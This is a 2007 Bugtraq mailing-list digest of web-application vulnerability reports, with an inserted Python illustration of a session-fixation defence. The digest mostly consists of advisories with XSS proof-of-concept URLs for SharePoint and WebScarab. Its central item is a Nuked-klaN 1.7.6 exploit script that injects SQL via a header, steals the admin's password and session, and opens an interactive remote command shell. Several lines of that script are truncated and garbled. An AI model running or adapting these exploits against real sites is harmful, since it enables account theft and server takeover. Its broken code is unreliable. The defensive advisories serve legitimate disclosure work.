Re: NPDS <= 5.10 - Multiple SQL injections

2007-05-05 Thread aeroxteam_PLEASEDONTSPAMUS
Note: Php-nuke may be vulnerable to the same bug...


[MajorSecurity Advisory #47]Simple Machines Forum (SMF) - Session fixation Issue

2007-05-05 Thread admin
[MajorSecurity Advisory #47]Simple Machines Forum (SMF) - Session fixation Issue

Details
===
Product: Simple Machines Forum (SMF)
Affected version: 1.1.2 and prior
Remote-Exploit: yes
Vendor-URL: http://www.simplemachines.org
Vendor-Status: informed
Advisory-Status: published

Credits

Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/index_2.php?major_rls=major_rls47

Introduction

"Simple Machines Forum — SMF in short — is a free, professional grade software package
that allows you to set up your own online community within minutes." -from simplemachines.org

More Details

1. Session fixation:
The "PHPSESSID" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before 
the user even logs into the target server.
After a user's session ID has been fixed, the attacker will wait for them to 
log in.
Once the user does so, the attacker uses the predefined session ID value to 
assume their online identity.

Workaround:

1. Do not accept session identifiers from GET / POST variables.

2. Regenerate the SID on each request.

3. Accept only server-generated SIDs:
One way to improve security is not to accept session identifiers that were not 
generated by the server.

session_start();
if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) {
    $_SESSION = array(); // ID was not issued by this server: discard all data bound to it
}
session_regenerate_id(true); // issue a fresh ID; true also removes the old session data
$_SESSION['SERVER_GENERATED_SID'] = true;


History/Timeline

30.04.2007 discovery of the vulnerability
03.04.2007 contacted the vendor
04.04.2007 working patch sent to the vendor
05.04.2007 advisory is written
05.04.2007 advisory released

MajorSecurity
===
MajorSecurity is a non-profit German penetration testing and security research project
which consists of only one person at the present time.
http://www.majorsecurity.de/
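As an added illustration of the workaround in the advisory above (this is not SMF code or the advisory's own), a small Python model of a session table that honours only IDs it issued itself and rotates the ID at login; `SessionStore`, `fixation_scenario` and the planted ID value are constructed for this example.

```python
import secrets


class SessionStore:
    """Server-side session table. The two flags model the advisory's
    workaround steps: reject client-chosen IDs, rotate the ID on login."""

    def __init__(self, trust_client_ids=False, rotate_on_login=True):
        self.trust_client_ids = trust_client_ids
        self.rotate_on_login = rotate_on_login
        self._sessions = {}  # sid -> session data

    def _issue(self, data):
        sid = secrets.token_hex(16)  # unpredictable, server-generated
        self._sessions[sid] = data
        return sid

    def resolve(self, client_sid):
        """Map the ID the browser sent (cookie or PHPSESSID parameter) to a session."""
        if client_sid in self._sessions:
            return client_sid
        if self.trust_client_ids and client_sid:
            # Weak behaviour: adopt whatever ID the client presents.
            self._sessions[client_sid] = {}
            return client_sid
        return self._issue({})  # unknown ID: start a fresh server-issued session

    def login(self, sid, user):
        """Authenticate the session; with rotation the pre-login ID stops working."""
        data = self._sessions[sid]
        data["user"] = user
        if self.rotate_on_login:
            del self._sessions[sid]
            return self._issue(data)
        return sid

    def user_of(self, sid):
        return self._sessions.get(sid, {}).get("user")


def fixation_scenario(store):
    """A planted ID sits in the victim's browser, the victim then logs in.
    Returns the user seen when that planted ID is later replayed (None = safe)."""
    planted = "1234abcd"  # constructed attacker-chosen value
    pre_login = store.resolve(planted)
    store.login(pre_login, "alice")
    return store.user_of(planted)
```

With default flags the planted ID never maps to the authenticated session; enabling `trust_client_ids` and disabling `rotate_on_login` reproduces the weak behaviour the advisory describes.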


ACP3 (v4.0b3) - Multiple Vulnerabilities

2007-05-05 Thread john



ACP3 (v4.0b3) - Multiple Vulnerabilities
discovered by John Martinelli (http://john-martinelli.com)
Google d0rk: "Diese Webseite wird angetrieben von ACP3"
(http://www.google.com/search?q=%22Diese+Webseite+wird+angetrieben+von+ACP3)









Nuked-klaN 1.7.6 Remote Code Execution Exploit

2007-05-05 Thread gmdarkfig

# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file requires the PhpSploit class.
require("phpsploitclass.php");     # If you want to use this class, the latest
                                   # version can be downloaded from acid-root.new.fr.

$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = ''; # proxy :
$pra = ''; # basic authentification 

$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

$config= array();
$config[]  = 'nuked'; # table prefix
$config[]  = 'nuked'; # cookie prefix
$config[]  = 'ORDER by date LIMIT 1'; # sql conditions
$config[]  = 'HAK';   # match, length <= 3
$config[]  = '';

$request   = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users 
$config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users 
$config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users 
$config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE 
user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";

for($i=0;$iaddheader("X-Forwarded-For",$sql);
$xpl->get($url);
$xpl->reset('header');
}

if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
  die("Exploit Failed");

$what = array("login","passwd","user_id","session");
for($i=0;$i ".$matches[2][$i];

if(empty($matches[2][3]))
  exit("\nNo session found");

# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);

$phpc = array(
frmdt_url   => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));

$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');

if(!preg_match('#\getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";

$sql   = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) 
CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE 
name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET 
type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";

for($i=0;$ipost($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)
{
# 0'); include('./conf.inc.php'); print $global['db_pass']; //
$xpl->reset('header');
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url);
$data = explode('123456789',$xpl->getcontent());
print $data[1]."\n\$shell> ";
}

function char($data)
{
$char='CHAR(';
for($i=0;$i


RE: XSS in Microsoft SharePoint

2007-05-05 Thread Jim Harrison
Tried and failed.
Exactly how have you configured your test SP site?

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
Sent: Friday, May 04, 2007 3:01 PM
To: bugtraq@securityfocus.com
Subject: XSS in Microsoft SharePoint

Hi!
I think this is an XSS in MS SharePoint; you can reproduce it on a
SharePoint test server using, for example, the following URL:

http://www.example.com/sharepoint/default.aspx/%22);}if(true){alert(%22qwertytis

This is due to a lack of string stripping when putting the path into
JavaScript.
 
It seems to work at least on every main page.
 
I tried to check for this on the web, but I didn't find this hole
anywhere.
 
-- 
Regards,
Solarius - http://www.solarius.name




Re: WebScarab <= 20060621-0003 cross site scripting

2007-05-05 Thread Rogan Dawes

[EMAIL PROTECTED] wrote (a LONG time ago):




SA0012

+  WebScarab Cross Site Scripting   +


PUBLISHED ON
  Jul 18, 2006


PUBLISHED AT
  http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt
  http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt.gpg


PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg, Germany
  http://moritz-naumann.com/

  SECURITY at MORITZ hyphon NAUMANN d0t COM
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


AFFECTED APPLICATION OR SERVICE
  WebScarab
  http://www.owasp.org/index.php/OWASP_WebScarab_Project
  http://sourceforge.net/projects/owasp/

  WebScarab is a Free Software for manual and semi-automatic
  web application penetration testing. It is developed in
  Java by Rogan Dawes as part of the Open Web Application
  Security Project (OWASP).


AFFECTED VERSIONS
  Version 20060621-0003 and below


ISSUES
  WebScarab is subject to a client side script code injection
  vulnerability which may allow for running cross site
  scripting attacks against web clients connecting through it.

  + 1. Cross Site Scripting vulnerability in error
   messages

  By accessing the following URI using a web browser which is
  prone to this issue and configured to proxy through a
  vulnerable version of WebScarab, a non-persistent web script
  injection can be achieved:

  http://arbitrary.domain/alert(0);

  This allows for disclosure of sensitive data stored in the
  security context of any arbitrary domain which the web browser
  has previously accessed but WebScarab is not able to access
  by the time the attack takes place (due to invalid upstream
  proxy setting on WebScarab, different results of DNS queries,
  limited connectivity or other reasons).

  MS Internet Explorer 6 SP2 and Konqueror 3.5.3 are known to
  be prone to this issue. This problem is caused by insufficient
  sanitation of user supplied input before it is returned to
  the client as part of an error message.


BACKGROUND
  Cross Site Scripting (XSS):
  Cross Site Scripting, also known as XSS or CSS, describes
  the injection of malicious content into output produced
  by a web application. A common attack vector is the
  inclusion of arbitrary client side script code into the
  applications' output. Failure to completely sanitize user
  input from malicious content can cause a web application
  to be vulnerable to Cross Site Scripting.

  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml


WORKAROUNDS
  Client: Disable Javascript.
  Server: None known.


SOLUTIONS
  Rogan Dawes has released version 20060718-1904 today.
  This version fixes this issue. The updated package is
  available at

http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823


TIMELINE
  Jul 18, 2006: Discovery, code maintainer notification
  Jul 18, 2006: Code maintainer provides fix
  Jul 18, 2006: Public advisory


REFERENCES
  N/A


ADDITIONAL CREDIT
  N/A


LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/


Due to a complete lack of actual testing, the abovementioned "fix" for 
this problem didn't actually do anything. Thanks to Nathaniel Roberts 
for pointing this out, even almost a year later.


A new release of WebScarab has been published that does actually fix 
this. It can be obtained from 



The full changelog since the previous version is available at 



Regards,

Rogan Dawes


XSS in Microsoft SharePoint

2007-05-05 Thread ville . solarius
Hi!
I think this is an XSS in MS SharePoint; you can reproduce it on a SharePoint test 
server using, for example, the following URL:

http://www.example.com/sharepoint/default.aspx/%22);}if(true){alert(%22qwertytis

This is due to a lack of string stripping when putting the path into JavaScript.
 
It seems to work at least on every main page.
 
I tried to check for this on the web, but I didn't find this hole anywhere.
 
-- 
Regards,
Solarius - http://www.solarius.name


Re: sunshop v4 >> RFI

2007-05-05 Thread lagged2hell
Those file references you are pasting are NOT from v4; in fact v4 isn't even 
vulnerable. Only 3.5 and earlier.


Re: Medium security hole affecting DSL-G624T

2007-05-05 Thread Tim Brown
On Thursday 03 May 2007 22:13:15 3APA3A wrote:

> This  vulnerability  for  D-Link  DSL-G624T was already reported by Jose
> Ramon Palanco. See
>
> http://securityvulns.ru/Odocument816.html
>
> Previously, same problem was reported for D-Link DSL-G604T by Qex
>
> http://securityvulns.ru/Mdocument578.html
>
>
> There were also few more problems reported about /cgi-bin/webcm, see
>
> http://securityvulns.ru/Idocument664.html
> http://securityvulns.ru/Idocument759.html

I quite agree, the Summary of my attached advisory makes this point.  However, 
as I also point out in the Solutions section, all of the issues you list were 
against major version 1 of the firmware.  We're now at major version 3 and 
directory traversal is still a problem.  Moreover, the advisories that cover 
directory traversal (http://securityvulns.ru/Mdocument578.html and 
http://securityvulns.ru/Mdocument578.html) only talk about /etc/passwd, 
neglecting the fact that the web server runs as root and that /etc/shadow is 
therefore available.

Secondly, the Javascript injection issue described is as far as I 
know /entirely new/.  It's not a short walk to the point where these two 
issues alone could be used to compromise devices, irrespective of the firmware 
issues you also link to.

Maybe, I'm hoping that by version 10 of the firmware in the year 2014, D-Link 
may actually manage to fix some of these reported problems?  Moreover, maybe 
they'll actually make it possible for researchers to report these things in a 
manner whereby they actually respond to the reports when contacted.  Not 
holding my breath though.

Tim
-- 
Tim Brown